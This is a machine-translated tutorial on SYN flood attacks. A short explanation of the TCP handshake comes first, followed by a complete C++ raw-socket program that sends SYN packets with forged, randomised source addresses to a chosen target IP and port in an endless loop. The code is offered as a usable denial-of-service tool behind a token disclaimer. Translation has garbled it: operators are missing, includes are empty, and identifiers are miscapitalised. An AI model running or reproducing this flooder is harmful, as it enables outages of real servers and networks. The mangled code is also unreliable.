Simple analysis and implementation of SYN_FLOOD
Writeby: liond8
Email: liond8@eyou.com
statement:
This procedure has a certain attack, please only use it for learning, do not endanger the network of the motherland. If you start attacking all consequences, I am not responsible.
There are a variety of attacks on the Internet to send packets (such as ICMP_FLOOD, Debris attack, etc.) which is the use of TCP protocols three handshakes (SYN_FLOOD). Let's take a look at the three handshakes of TCP.
There are now A, B two machines, where B is Server.a is Client.
First A send a data reported with the SYN tag (with start sequence number) to B.
Then B receive, and then send an ACK SYN (the active number of the B-machine start sequence number and A) to A.
Final A will then send a data report for serial number and confirmation number to B.
The connection is completed at this time.
Using this principle, if the A machine is sent a large number of machines that do not exist in the first step, then B is sent to b, then B will be connected to a lot of legal machine requests, and then check one by one. Then wait for the third confirmation establishment connection. Then a large number of waiting for the connection is retained in the stack. The general server waits for 2 minutes, and the connection request will be removed from the stack waiting for the connection. If SYN is sent fast enough, the legal user can not connect, the server will also spend a lot of resources to maintain the stack. Thereby, it is also a D.O.s attack.
Through Raw_Socket, as long as you are an administrator, you can fake the IP and TCP headers, and the SYN request for false source addresses.
=================================================================================================================================================================================
Simple implementation is as follows:
/ * Flood.cpp * /
#include
#include
#include
#include
#include
#include
#pragma comment (Lib, "WS2_32.LIB")
#define max_receivebyte 255
Typedef struct ip_head // Defines IP headers
{
Unsigned char h_verlen; // 4 top length, 4-digit IP version number
Unsigned char TOS; // 8 service type TOS
Unsigned short total_len; // 16-bit total length (bytes)
UNSIGNED short ident; // 16 bit identity
Unsigned short frame_and_flags; // 3 bits (such as SYN, ACK, etc.)
Unsigned char TTL; // 8-bit survival time TTL
UNSIGNED Char proto; // 8-bit protocol (such as ICMP, TCP, etc.)
Unsigned short checksum; // 16-bit IP header checksum unsigned int sourceip; // 32 bitsource IP address
UNSIGNED INT Destip; // 32 bit IP address
} Ipheader;
Typedef struct tcp_head // Defines TCP header
{
Ushort th_sport; // 16 bond source port
USHORT TH_DPORT; / / 16-bit destination port
Unsigned int th_seq; // 32-bit serial number
UNSIGNED INT TH_ACK; / / 32 bit confirmation number
Unsigned char th_lenres; // 4 head length / 6 reserved words
Unsigned char th_flag; // 6 bit flag
Ushort TH_WIN; / / 16-bit window size
USHORT TH_SUM; / / 16-bit checksum
Ushort TH_URP; // 16-bit emergency data offset
} TCPHEADER;
TYPEDEF STRUCT TSD_HEAD / / Define TCP Pseudo
{
Unsigned long saddr; // source address
Unsigned long daddr; // destination address
CHAR MBZ;
CHAR PTCL; // Protocol Type
Unsigned short tcpl; // TCP length
} PSDHeader;
// Checksum: Computing the subunies of the checksum
Ushort Checksum (Ushort * Buffer, int size)
{
Unsigned long cksum = 0;
While (size> 1)
{
CKSUM = * Buffer ;
Size - = SizeOf (Ushort);
}
size
{
CKSUM = * (Uchar *) BUFFER;
}
CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);
CKSUM = (CKSUM >> 16);
Return (Ushort) (~ CKSUM);
}
Void usage ()
{
PRINTF ("***************************************************** ************ ");
Printf ("SYN_FLOOD MADE BY LIOND8);
Printf ("Useage: flood target_ip target_port delay_time");
PRINTF ("***************************************************** ************ ");
}
// delay_time unit is milliseconds.
Int main (int Argc, char * argv [])
{
Wsadata wsadata;
Socket sock;
SockAddr_in addr_in;
Ipheader ipheader;
TCPHEADER TCPHEADER;
PSDHeader PSDHead;
Int Sourceport;
Char szsendbuf [60] = {0};
Bool flag;
Int Rect, NTimeover;
Int Sleeptime;
USAGE ();
IF (Argc <3 || Argc> 4)
{Printf ("INPUT ERROR!");
Return false;}
IF (argc == 4) Sleeptime = ATOI (Argv [3]);
Else Sleeptime = 300;
IF (WSAStartup (MakeWord (2, 2), & WSADATA)! = 0) {
Printf ("WSAStartup Error!");
Return False;
}
Sock = NULL;
IF ((Sock = Socket (AF_INET, SOCK_RAW, IPPROTO_IP) == Invalid_socket
{
Printf ("Socket Setup Error!");
Return False;
}
Flag = true;
IF (setsockopt (sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (flash) == Socket_ERROR)
{
Printf ("setsockopt ip_hdrincl!");
Return False;
}
NTIMEOVER = 1000;
IF (SetsockOpt, SO_SNDTIMEO, (CHAR *) & ntimeover, sizeof (ntimeover) == Socket_ERROR) // Settings the time
{
Printf ("SetsockOpt SO_SNDTIMEO ERROR!");
Return False;
}
Addr_in.sin_family = af_INet;
Addr_in.sin_port = htons (ATOI (ARGV [2]));
Addr_in.sin_addr.s_un.s_addr = inet_addr (Argv [1]);
While (True)
{
// Fill the IP head
Ipheader.h_verlen = (4 << 4 | sizeof (iPheter) / sizeof (unsigned long);
Ipheader.tos = 0;
Ipheader.total_len = htons (ipheader) sizeof (TCPHEADER)); // IP total length
ipHeader.Ident = 1;
ipheader.frag_and_flags = 0; // No slide
Ipheader.ttl = (unsigned char) gettickcount ()% 87 123;
ipHeader.Proto = ipproto_tcp; // Protocol type TCP
ipHeader.checksum = 0; // The value of the test is initially 0
Ipheader.sourceip = HTONL (GettickCount () * 474695); // Randomly generate a forged IP
ipHeader.Destip = inet_addr (argv [1]); // Target IP
// Pack TCP header
Sourceport = gettickcount () * 43557% 9898; // randomly generated a port number
TCPHEADER.TH_DPORT = HTONS (ATOI (ARGV [2])); // Sending destination port
TCPHEADER.TH_SPORT = HTONS (Sourceport); // Source port number
TCPHEADER.TH_SEQ = HTONL (0x12345678); // serial number
TCPHEADER.TH_ACK = 0; // confirmation number
TCPHEADER.TH_LENRES = (SIZEOF (TCPHEADER) / 4 << 4 | 0);
TCPHEADER.TH_FLAG = 2; / / Request for SYN
TCPHEADER.TH_WIN = HTONS (512);
TCPHEADER.TH_URP = 0;
TCPHEADER.TH_SUM = 0;
// Fill the TCP pseudo head for calculating the TCP header's papers and psdheader.saddr = ipHeader.SourceIP;
PSDHeader.daddr = ipheader.destip;
PSDHeader.mbz = 0;
PSDHeader.ptcl = ipproto_tcp;
PSDHeader.tcpl = htons (sizeof (tcpHeader));
// calculate the checksum
Memcpy (Szsendbuf, & Psdheader, Sizeof (psdheader));
Memcpy (Szsendbuf Sizeof (Psdheader), & Tcpheader, Sizeof (TCPHEADER);
TCPHEADER.TH_SUM = Checksum ((Ushort *) SzsendBuf, SizeOf (PSDHeader) Sizeof (TCPHEADER));
// put the forged IP head and TCP head into BUF ready to send
Memcpy (SzsendBuf, & ipheader, sizeof (ipheader);
Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader);
// Send a packet
Rect = Sendto (Sock, SzsendBuf, SizeOf (Ipheader) SizeOf (TCPHEADER), 0, (Struct SockAddr *) & addr_in, sizeof (addr_in));
IF (Rect == Socket_ERROR)
{
Printf ("Send Error!:% X", Wsagetlasterror ());
Return False;
}
Else
Printf ("Send OK!");
Sleep (SleepTime); // Determine this value according to your network speed, the smaller the SleepTime, the faster you get
} // endwhile // Re-falsify the source address of IP again to send the target
CloseSocket (SOCK);
WSACLEANUP ();
Return 0;
}
Compiled by VC 6.0.
